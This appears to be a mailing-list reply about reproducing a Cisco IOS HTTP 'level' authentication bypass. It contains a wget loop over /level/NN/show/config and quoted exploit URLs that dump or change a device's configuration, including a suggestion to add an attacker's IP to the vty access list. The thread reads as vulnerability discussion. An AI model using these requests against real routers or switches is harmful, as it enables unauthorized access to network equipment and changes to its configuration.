hi,

i cant seem to recreate this exploit on any of my 1900/2900/2500/2600's?

ip http server
ip http authentication local

i have a little /bin/sh that does the following:

wget http://10.10.10.10/level/16/show/config
.
.
wget http://10.10.10.10/level/99/show/config


i get auth failed on all of them! anyone?

Regards,

Marc-Adrian Napoli
Network Administrator
Connect infobahn Australia
+61 2 92120387


> You can also run configuration commands. :)
> 
> http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.
> 
> Start with http://169.254.0.16/level/xx/configure  and go from there.
> 
> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
> 
> to get, for instance, vty 0 4 acl information and then add an ACL for
> his/her source ip. 
> 
> I tested creating a banner.  I assume other configure commands will work
> as well.  This was tested on a Cisco switch.  Anyone?
> 
> 
> 
> 

Reply via email to